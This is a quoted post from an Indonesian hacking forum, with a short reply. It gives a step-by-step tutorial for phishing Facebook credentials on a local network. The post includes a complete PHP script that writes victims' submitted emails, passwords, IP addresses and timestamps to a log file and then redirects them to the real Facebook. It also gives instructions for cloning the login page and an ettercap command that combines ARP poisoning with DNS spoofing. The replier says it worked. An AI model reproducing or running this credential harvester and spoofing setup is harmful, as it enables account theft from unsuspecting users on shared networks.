[Share] ettercap dns_spoof (fake login) #PART 2
#53
(08-29-2011, 06:39 PM)koecroet Wrote: oke om disini ane mau share tentang fake login atau phising featuring arp_spoof. mungkin cara ini udah basi banget diantara brother. tapi tujuan ane cuma untuk berbagi tidak lebih .
untuk lebih jelas nya baca dulu #PART 1 nya om di mari /showthread.php?tid=697&highlight=%23PART+1

oke deh langsung aja, disini ane mau menggunakan fake login facebook.

1. buka
2. save page as dah, tapi disimpennya di "/var/www" dengan nama "index.html"
3. udah di save kan tuh?? yaudah. close gih browser lu. wkwkwkwkwk. egk om becanda ane. hehe
edit file "index.html" search tulisan "action".
SS:
Spoiler! :

4. ubah dengan "post.php"
SS:
Spoiler! :

5. untuk file php "post.php" nya:
Spoiler! :
Quote:<?php

$file = "logs.txt";

$username = $_POST['email'];

$password = $_POST['pass'];

$ip = $_SERVER['REMOTE_ADDR'];

$today = date("F j, Y, g:i a");



$handle = fopen($file, 'a');

fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");

fwrite($handle, "\n");

fwrite($handle, "Email: ");

fwrite($handle, "$username");

fwrite($handle, "\n");

fwrite($handle, "Password: ");

fwrite($handle, "$password");

fwrite($handle, "\n");

fwrite($handle, "IP Address: ");

fwrite($handle, "$ip");

fwrite($handle, "\n");

fwrite($handle, "Date Submitted: ");

fwrite($handle, "$today");

fwrite($handle, "\n");

fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");

fwrite($handle, "\n");

fwrite($handle, "\n");

fclose($handle);

echo "<script LANGUAGE=\"JavaScript\">

<!--

window.location=\"https://login.facebook.com/login.php?login_attempt=1\";

// -->

</script>";

?>

jangan lupa tetep ditaro di "/var/www"
6. edit "post.php"
SS:
Spoiler! :

7. edit "etter.dns" di directory "/usr/local/share/ettercap/"
SS:
Spoiler! :

8. jalankan deh:
#ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
ane pake interfaces wlan0
9. testing di browser client lain:
SS:
Spoiler! :

10. muncul pesan dulu Big Grin :
SS:
Spoiler! :

11. terus page dialihin ke gagal login:
SS:
Spoiler! :

12. sekarang tinggal liat hasil deh Big Grin :
SS:
Spoiler! :


finish.
maaf ya om, pengguna baru aja bikin tread panjang2 gini. hehe

ket: agar file yang di "/var/www" bisa diakses jangan lupa untuk mengaktifkan apache.
#/etc/init.d/apache2 start



ane udah berhasil om, Big Grin makasih buuuaanyaaakkk

salam hangat backtracker kalimantan


Messages In This Thread
RE: ettercap dns_spoof (fake login) #PART 2 - by blu3creter - 12-31-2012, 12:07 PM




Users browsing this thread: 2 Guest(s)